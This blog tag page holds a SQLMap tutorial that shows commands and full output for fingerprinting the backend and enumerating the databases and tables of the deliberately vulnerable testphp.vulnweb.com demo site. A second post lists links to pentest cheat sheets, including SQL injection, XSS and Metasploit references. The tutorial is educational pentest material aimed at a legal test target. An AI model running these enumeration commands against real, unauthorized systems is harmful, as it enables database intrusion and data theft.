Posts tagged sqlinjection

Using SQLMap for sql Injection

0

We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ’0.701′ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ’0.701′ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ’0.701′ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com’[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ’0.701′ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’: modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques

Security Assessment and Pentest tools Cheat Sheets

3

Got from my old Bookmarks ,below are some useful Cheat Sheets ,let me know if u found any other cheat sheets i will update the post

Nmap
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Nessus
http://www.secguru.com/link/nessus_nmap_scanning_cheatsheet
Backtrack 4
http://www.corelan.be:8800/index.php/2009/07/04/backtrack-4-cheat-sheet/
misc tools
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf
Metasploit Meterpreter
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
http://www.rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html


Oracle Security
http://www.red-database-security.com/wp/oracle_cheat.pdf
XSS
http://ha.ckers.org/xss.html
http://openmya.hacker.jp/hasegawa/security/utf7cs.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQl Injection
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

Microsoft SQL,Sybase,MySQL,Oracle,PostgreSQL,DB2,IngresBypass SQL Injection Filters
http://michaeldaw.org/sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheets/
Packetlife Cheatsheets

http://packetlife.net/cheatsheets/

Ed Skoudis’ Pentest Cheatsheets

Windows commandline tools
http://www.sans.org/resources/sec560/windows_command_line_sheet_v1.pdf
Netcat Cheat Sheet
http://www.sans.org/resources/sec560/netcat_cheat_sheet_v1.pdf
Useful Attack Tools, Metasploit commands, HPing, FGDump
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf

Reverse Engineering Malware Cheat Sheet

http://zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

Security Archiecture Cheat Sheet for Internet Applications

http://zeltser.com/security-management/security-architecture-cheat-sheet.html

CEH cheatsheets from Mindcert

http://www.mindcert.com/resources/MindCert_Nmap_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Enumeration_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Ethical_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Footprinting_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Scanning_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_System_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Trojans_MindMap.pdf

http://www.mindcert.com/resources/CCNA_Cisco_IP_Routing.pdf

Go to Top